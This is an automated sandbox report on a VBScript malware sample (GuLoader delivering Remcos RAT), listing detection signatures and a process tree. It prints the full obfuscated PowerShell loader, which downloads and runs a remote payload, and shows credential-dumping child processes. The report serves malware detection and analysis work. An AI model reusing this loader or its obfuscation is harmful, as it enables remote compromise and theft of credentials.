Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOA.vbs

Overview

General Information

Sample name:SOA.vbs
Analysis ID:1465863
MD5:5eb7f6fdbef3c0d5203a8a04a09f2b39
SHA1:6931cbc28345d13ca66694f5059c05d4f8889f73
SHA256:9bb93f41ee5ed09fe6ad9c7c150dbc06280ee08f746d9a1ac9da501d7ad53c9e
Tags:GuLoaderRATRemcosRATvbs
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4084 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivariidPrimasse,ruitbesStetikkiHjemstatSnaph neSkrukh.)Meretr. ');Sarcophilus (Brassart ' abong$UtmmeligDragelsl stak,eo hoirwib WartleaBffengolBasebal:Fejl,asBParodiel SkyldsoCopo,ymo PensiodDdlkkerr Lavesto HalvenoTvangsftAde,omo= Ue enn$DrblernSArbejdsk UanselrBalle.eb ForvrieKulle slover.ari Skinang Fuldbat Babasc1.roathl5Spoonb,7 Antidr.BloodtesAfske.spOvercomlBidragsiCrot.nttT,ansve( Ordnyo$ingenirC Snert,oBarnedan Pred.bsUgrssetc recoloiB.rdolpo,xtermin FaradiaAfdelinbRygelselUhaandteCestoshnGlobalseBeneficsAssu.ersTeddip )Nonrege ');Sarcophilus (Brassart 'Elvrks,[MarkedsNMerisise talerstLeasing.SonshipSAvertere Forsder,anidiavCrewmemi TopnglcKonomsaeTr.vlemPRe,ervioInternai nonsabnOpercultddstegnM SeborramumbudgnInfusioaArchiepgUnderdeeOplysnir Bu.lhe]Strolls: Fal.ib: parinS BootsteVimineocStanduruRiantagrBeg.deliBaudrattTipier yParticuPUdearberPhenylao Non.irt Fedtsmo untrifcShamecaoTrf,erel Styreh Crystal=Stroppi Specif [.ilodenNHelaafke MnterntBrednin.NonpathS Pa.ticeCollinscboganm uBedsp.or,rndeviiInkassotBanesaay irreduP toptyvrBygge ao HighlatShog.unoD.theryc kammenoBadel.glNdvendiTOpdatery MglingpbrachiaeEl.ctro] Orange:Scaletl:CrowdedTOps.revlPapirstsVenomos1Forvund2Mandril ');$Skrbeligt157=$Bloodroot[0];$Afguder= (Brassart 'Krohold$ EloinigholocenlGaveafgoEctomerb TerritaRenunculContain: AflvniH Emanc,iKeyma lgTillaegh ValidebR usenuaMeta,ralunbundll linguisKamera,=EfterliNOutsavoe ombazw Synneu-gedebolOTopcoatbfrsteopjvar.edneEkstempc KlemtvtCheekpi vindic SZizyphuyTimonias krydsmtAn tomie Raffl,mUnderbe. maskinNDep,ecieYvindsptMon.oli.KvilibrWDakoitieLyrer,ebNonfixaCClinkstlDemimoniBriseiserationenTilstedt');$Afguder+=$Inexertion[1];Sarcophilus ($Afguder);Sarcophilus (Brassart ' Stngen$.efektiH olphiniChristigH.farveh AfbenybExtrasea StosnilUnderbulBasnglesVrdia,g.EncreasHAppropieEft,rbeaSuggestdFi palueHypermer,askekus Skr.ld[ hroni$Sta.usoCAnkelsoaHandelsp kanderkHuovertiOrientenUdvikli] Benzoa=Moyleu,$Sund,edDAsthorieT.unkfil Azollae P,rtystNoce ceiUn,ervivTachygeeSlipove ');$breplansbaad=Brassart 'inholdi$HalopsyHStellari BibliogKi skejh Longhebcylindra erohylMbel,ablNiveau.sPlane,a.BlthaveDJagtgstoPseudoswthe mogn CavlinlTintefeoDingenoaRykkerbdReperc,F .yngdeiLgehuselUnsupere ,amliv( El.ond$Stirre,SRe,tartkKi,dredrSlukninb West.aeShielddlShoecrai KonfiggFyringstHandels1 Perthi5Sar,ens7 Sniffi, Sympat$MassesuS OmlasttBo,anopaRelendinEnrheumdTran,itaMindsterBevgeapdInf,atiiKokosndsPokinglaContaint LooingiDelegatoTetanolnHomotrasu smidn) Dipt r ';$Standardisations=$Inexertion[0];Sarcophilus (Brassart 'Undece.$CotraitgvippedelUnderpuoRejoicibFrilanda S,ekodlNontran:Voluntes Ko.plet ElvesqaBlomst v Wh,tsolPaedophyNrmertrgTrkproctFrak,ioeAkselafrh,tzerssRepract=jespejl(tipbartT S.rtkueStandars,narchitFagacea- colandP Delsteasalvad tGl,nsnuh Norman Vrksted$Margi sSBaginditGolftrjaSuprasqnHema oxdCanthutaTsesantr NoncomdEibrittiParodics SemestaAchaemet CriminiDisgraco Thre,tnAggregasErg,ter)tempori ');while (!$stavlygters) {Sarcophilus (Brassart ' Sonsie$Konservg Crocial BostnioOffervibFloragraskriveml Lum.er:EksisteH S,ikkev Un.erbn,ireraue DeposarBogma,k=Snapsfl$PreaccutImp nitrAcetylsuArticuleAbsorbe ') ;Sarcophilus $breplansbaad;Sarcophilus (Brassart 'Rgerli,SSm thertChalqueaEctocunrD.pravetrebroac-Ungt liSYver,idlGttevrke Aktualegen ralpOverfla F.brika4Vegetat ');Sarcophilus (Brassart 'Tchapan$PlovskrgAircondlGangninoGi termbOvervinaRigsarklVaabenm:,ansslus ProgratOpgrelsaSethprdv TrolovlKonsuley Me.tingDenyerat Forep eAu ocarrreinvessSpaltet=Transce(G,rhamiT mbelfae Meste sAntimettCasca,o- SpritbP Banesaagruntsct Omsalgh Halvku m.narc$MarchpaSWiederhtFeuderva PolyphnReballodO,eratiaUnderskrCrammeldMenneskiraflendsFjendtla NongymtRandomniFremmedoTilintenBaculess,ychosi)Afkor.e ') ;Sarcophilus (Brassart 'Songsm $ TurritgAnti,rol upmanwo KravlebIsomalta Hamatal Omd ni:ReticulICounternVebogenfHyperdioSaltingrBlawingm Avle.ya ntervotAfgoerei DumpedcResurseaCoalise2 Ancres0 Diffra0Borityj=Reassur$Soranskg,uckhoulMauricioTuftsblbOutrhymaGazettel Standa:InterioB tolerarPatriotiTostadol .semafl SorehoiNear,rdager.temnAreopagcdiaxiali FetisheStitchwsVeinle,+ Havned+Teg,ede%Stenoty$OpraabtBIngui olSmutturoVeludvio Ebbiskd trfferrMacera,oAnisoptoFonetiktIns,rin.PlateaucDecimaloAdu ticuSurinamnOwnabletRaklebr ') ;$Skrbeligt157=$Bloodroot[$Informatica200];}$Kontekstfri=314175;$Untastefulness=30570;Sarcophilus (Brassart 'Outpush$ ReopergFolketilVerfendo Hyacinbno.answaAcrimonlsailo.i:AromatiFCaciqueoInterner Gyptolb FljeneyWithanitAulaegutC ukkere.sonnrrrSaltvan breamun=Ste,mep InclusGDisordeeCirkulatno voli-AfglatcCStan.aroI,ereskn Morf.rtAsker,geCumaruonsulta.etF.imure Sydsles$MicroanSAnteprotEnklesta SwartynS ecifid H.pertaHovedkarIlddaabdCotyla,iSeromans SysletaBalsamitExosmosiMarlingo.kjtebanPanteresUnchari ');Sarcophilus (Brassart 'Udekamp$ monon gF,emkallSulfoneokolibakbvidnefraSystemsl Scilli:L,censuRSpe.dere UnencunN crotogSnirkleu liniese .ecert Castrat=Fgte,ne Unsupp[ Ghe toS StudieyCinderis.rotosaton.matoeUfoenanmStnknin. SwizzlC Thayneo,uillain AffektvWuggisheFedestirDkslastt Sorc r]grundpr: Stim.l:AdventuF.ragmenrPr tovuoSk.oldlm.rukkenBervilseaHypoptesTubercueAfounde6Paspalu4BlddeleSTrach,mt Abla,irAmphoroiOvers,rnRegnemsg Hnenth(.anseor$ .ystmoFAstronooF emskrrGothshjbcombustyAccentetInhumertSkema,ieWallabyrEntea,l).inigol ');Sarcophilus (Brassart 'Inte va$Uneatingti etallNonextioAntispibFingersaSkj.ebalOpsigel:A teriicsgernebo Ut lism.anktbem Forkv.eAssertrrGrundbgc Supe diPikkenda Radi.blThorvaliTerrorizUnl gisiProjektnGenskabgKomedie Wyliesk=Buelamp Panikke[Unc mprSBartendyDiabetes LangtitnonexuleGa,erskmBaar.rf. AviatoT UnjoureTarsioix FlawfltAl ergi.UnfrangEPlisseenLysreklcKilendeoA tenuad dtungeiHar anhnMinbugsg pixpap]S,iklag:Obconic:Misi teAHeksen.SCounterC.tjlernIStarkypIPaalgsc.ModigstGBart nde Pallout M,nunaSReplik,tvggenstrSabbatii StruggnUdstykkgRagtim.(bladder$.elefonR,rthogreItineranAfdoedtgRemateduRadioakeMisfeat)Datauhe ');Sarcophilus (Brassart 'Bailage$Scler.sgBes vdol nidudioKanutudb eripeaSintri.lCa,ital:Daane oUUdlbstinMateriacP otoplrSalatoly ramatusSynchrotSangu ma capryllApastrolSti,hediKo,eplazPoloskjaTil ntebGoodwiliServi pl enecoliTypehustAffaldsiGavottieA,tomatsSpandre=Tilstrm$ Fejlrec,omputeoMis.etrmInva idmTaflerte For lirLderpuncUl.iereiArgumenaActinull SculleiGr.bworzEspad iiBrugstyn Boble gTrammel. Digamms Ge,tatu hamfebReglemesLer aretAmar,nerSchoo.siFysiurgnFladbl,gHerskab(En.erso$La.aniaKFngselsoSnderlenBilineatU,blusheUnpitiek S,reflsHeikesltHera lefTillbe.rS,elteriEpiphys,Morbro $ ActinoUDotlikenIngravet Skrivea SubmersMystifitTraitoreLetterifTenen.uu lleapplNonrespn Mismo eDemeritsPersonasarsenic)Rhinsku ');Sarcophilus $Uncrystallizabilities;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5396 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7368 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivariidPrimasse,ruitbesStetikkiHjemstatSnaph neSkrukh.)Meretr. ');Sarcophilus (Brassart ' abong$UtmmeligDragelsl stak,eo hoirwib WartleaBffengolBasebal:Fejl,asBParodiel SkyldsoCopo,ymo PensiodDdlkkerr Lavesto HalvenoTvangsftAde,omo= Ue enn$DrblernSArbejdsk UanselrBalle.eb ForvrieKulle slover.ari Skinang Fuldbat Babasc1.roathl5Spoonb,7 Antidr.BloodtesAfske.spOvercomlBidragsiCrot.nttT,ansve( Ordnyo$ingenirC Snert,oBarnedan Pred.bsUgrssetc recoloiB.rdolpo,xtermin FaradiaAfdelinbRygelselUhaandteCestoshnGlobalseBeneficsAssu.ersTeddip )Nonrege ');Sarcophilus (Brassart 'Elvrks,[MarkedsNMerisise talerstLeasing.SonshipSAvertere Forsder,anidiavCrewmemi TopnglcKonomsaeTr.vlemPRe,ervioInternai nonsabnOpercultddstegnM SeborramumbudgnInfusioaArchiepgUnderdeeOplysnir Bu.lhe]Strolls: Fal.ib: parinS BootsteVimineocStanduruRiantagrBeg.deliBaudrattTipier yParticuPUdearberPhenylao Non.irt Fedtsmo untrifcShamecaoTrf,erel Styreh Crystal=Stroppi Specif [.ilodenNHelaafke MnterntBrednin.NonpathS Pa.ticeCollinscboganm uBedsp.or,rndeviiInkassotBanesaay irreduP toptyvrBygge ao HighlatShog.unoD.theryc kammenoBadel.glNdvendiTOpdatery MglingpbrachiaeEl.ctro] Orange:Scaletl:CrowdedTOps.revlPapirstsVenomos1Forvund2Mandril ');$Skrbeligt157=$Bloodroot[0];$Afguder= (Brassart 'Krohold$ EloinigholocenlGaveafgoEctomerb TerritaRenunculContain: AflvniH Emanc,iKeyma lgTillaegh ValidebR usenuaMeta,ralunbundll linguisKamera,=EfterliNOutsavoe ombazw Synneu-gedebolOTopcoatbfrsteopjvar.edneEkstempc KlemtvtCheekpi vindic SZizyphuyTimonias krydsmtAn tomie Raffl,mUnderbe. maskinNDep,ecieYvindsptMon.oli.KvilibrWDakoitieLyrer,ebNonfixaCClinkstlDemimoniBriseiserationenTilstedt');$Afguder+=$Inexertion[1];Sarcophilus ($Afguder);Sarcophilus (Brassart ' Stngen$.efektiH olphiniChristigH.farveh AfbenybExtrasea StosnilUnderbulBasnglesVrdia,g.EncreasHAppropieEft,rbeaSuggestdFi palueHypermer,askekus Skr.ld[ hroni$Sta.usoCAnkelsoaHandelsp kanderkHuovertiOrientenUdvikli] Benzoa=Moyleu,$Sund,edDAsthorieT.unkfil Azollae P,rtystNoce ceiUn,ervivTachygeeSlipove ');$breplansbaad=Brassart 'inholdi$HalopsyHStellari BibliogKi skejh Longhebcylindra erohylMbel,ablNiveau.sPlane,a.BlthaveDJagtgstoPseudoswthe mogn CavlinlTintefeoDingenoaRykkerbdReperc,F .yngdeiLgehuselUnsupere ,amliv( El.ond$Stirre,SRe,tartkKi,dredrSlukninb West.aeShielddlShoecrai KonfiggFyringstHandels1 Perthi5Sar,ens7 Sniffi, Sympat$MassesuS OmlasttBo,anopaRelendinEnrheumdTran,itaMindsterBevgeapdInf,atiiKokosndsPokinglaContaint LooingiDelegatoTetanolnHomotrasu smidn) Dipt r ';$Standardisations=$Inexertion[0];Sarcophilus (Brassart 'Undece.$CotraitgvippedelUnderpuoRejoicibFrilanda S,ekodlNontran:Voluntes Ko.plet ElvesqaBlomst v Wh,tsolPaedophyNrmertrgTrkproctFrak,ioeAkselafrh,tzerssRepract=jespejl(tipbartT S.rtkueStandars,narchitFagacea- colandP Delsteasalvad tGl,nsnuh Norman Vrksted$Margi sSBaginditGolftrjaSuprasqnHema oxdCanthutaTsesantr NoncomdEibrittiParodics SemestaAchaemet CriminiDisgraco Thre,tnAggregasErg,ter)tempori ');while (!$stavlygters) {Sarcophilus (Brassart ' Sonsie$Konservg Crocial BostnioOffervibFloragraskriveml Lum.er:EksisteH S,ikkev Un.erbn,ireraue DeposarBogma,k=Snapsfl$PreaccutImp nitrAcetylsuArticuleAbsorbe ') ;Sarcophilus $breplansbaad;Sarcophilus (Brassart 'Rgerli,SSm thertChalqueaEctocunrD.pravetrebroac-Ungt liSYver,idlGttevrke Aktualegen ralpOverfla F.brika4Vegetat ');Sarcophilus (Brassart 'Tchapan$PlovskrgAircondlGangninoGi termbOvervinaRigsarklVaabenm:,ansslus ProgratOpgrelsaSethprdv TrolovlKonsuley Me.tingDenyerat Forep eAu ocarrreinvessSpaltet=Transce(G,rhamiT mbelfae Meste sAntimettCasca,o- SpritbP Banesaagruntsct Omsalgh Halvku m.narc$MarchpaSWiederhtFeuderva PolyphnReballodO,eratiaUnderskrCrammeldMenneskiraflendsFjendtla NongymtRandomniFremmedoTilintenBaculess,ychosi)Afkor.e ') ;Sarcophilus (Brassart 'Songsm $ TurritgAnti,rol upmanwo KravlebIsomalta Hamatal Omd ni:ReticulICounternVebogenfHyperdioSaltingrBlawingm Avle.ya ntervotAfgoerei DumpedcResurseaCoalise2 Ancres0 Diffra0Borityj=Reassur$Soranskg,uckhoulMauricioTuftsblbOutrhymaGazettel Standa:InterioB tolerarPatriotiTostadol .semafl SorehoiNear,rdager.temnAreopagcdiaxiali FetisheStitchwsVeinle,+ Havned+Teg,ede%Stenoty$OpraabtBIngui olSmutturoVeludvio Ebbiskd trfferrMacera,oAnisoptoFonetiktIns,rin.PlateaucDecimaloAdu ticuSurinamnOwnabletRaklebr ') ;$Skrbeligt157=$Bloodroot[$Informatica200];}$Kontekstfri=314175;$Untastefulness=30570;Sarcophilus (Brassart 'Outpush$ ReopergFolketilVerfendo Hyacinbno.answaAcrimonlsailo.i:AromatiFCaciqueoInterner Gyptolb FljeneyWithanitAulaegutC ukkere.sonnrrrSaltvan breamun=Ste,mep InclusGDisordeeCirkulatno voli-AfglatcCStan.aroI,ereskn Morf.rtAsker,geCumaruonsulta.etF.imure Sydsles$MicroanSAnteprotEnklesta SwartynS ecifid H.pertaHovedkarIlddaabdCotyla,iSeromans SysletaBalsamitExosmosiMarlingo.kjtebanPanteresUnchari ');Sarcophilus (Brassart 'Udekamp$ monon gF,emkallSulfoneokolibakbvidnefraSystemsl Scilli:L,censuRSpe.dere UnencunN crotogSnirkleu liniese .ecert Castrat=Fgte,ne Unsupp[ Ghe toS StudieyCinderis.rotosaton.matoeUfoenanmStnknin. SwizzlC Thayneo,uillain AffektvWuggisheFedestirDkslastt Sorc r]grundpr: Stim.l:AdventuF.ragmenrPr tovuoSk.oldlm.rukkenBervilseaHypoptesTubercueAfounde6Paspalu4BlddeleSTrach,mt Abla,irAmphoroiOvers,rnRegnemsg Hnenth(.anseor$ .ystmoFAstronooF emskrrGothshjbcombustyAccentetInhumertSkema,ieWallabyrEntea,l).inigol ');Sarcophilus (Brassart 'Inte va$Uneatingti etallNonextioAntispibFingersaSkj.ebalOpsigel:A teriicsgernebo Ut lism.anktbem Forkv.eAssertrrGrundbgc Supe diPikkenda Radi.blThorvaliTerrorizUnl gisiProjektnGenskabgKomedie Wyliesk=Buelamp Panikke[Unc mprSBartendyDiabetes LangtitnonexuleGa,erskmBaar.rf. AviatoT UnjoureTarsioix FlawfltAl ergi.UnfrangEPlisseenLysreklcKilendeoA tenuad dtungeiHar anhnMinbugsg pixpap]S,iklag:Obconic:Misi teAHeksen.SCounterC.tjlernIStarkypIPaalgsc.ModigstGBart nde Pallout M,nunaSReplik,tvggenstrSabbatii StruggnUdstykkgRagtim.(bladder$.elefonR,rthogreItineranAfdoedtgRemateduRadioakeMisfeat)Datauhe ');Sarcophilus (Brassart 'Bailage$Scler.sgBes vdol nidudioKanutudb eripeaSintri.lCa,ital:Daane oUUdlbstinMateriacP otoplrSalatoly ramatusSynchrotSangu ma capryllApastrolSti,hediKo,eplazPoloskjaTil ntebGoodwiliServi pl enecoliTypehustAffaldsiGavottieA,tomatsSpandre=Tilstrm$ Fejlrec,omputeoMis.etrmInva idmTaflerte For lirLderpuncUl.iereiArgumenaActinull SculleiGr.bworzEspad iiBrugstyn Boble gTrammel. Digamms Ge,tatu hamfebReglemesLer aretAmar,nerSchoo.siFysiurgnFladbl,gHerskab(En.erso$La.aniaKFngselsoSnderlenBilineatU,blusheUnpitiek S,reflsHeikesltHera lefTillbe.rS,elteriEpiphys,Morbro $ ActinoUDotlikenIngravet Skrivea SubmersMystifitTraitoreLetterifTenen.uu lleapplNonrespn Mismo eDemeritsPersonasarsenic)Rhinsku ');Sarcophilus $Uncrystallizabilities;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7456 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7732 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7928 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7936 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7952 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7960 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7968 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
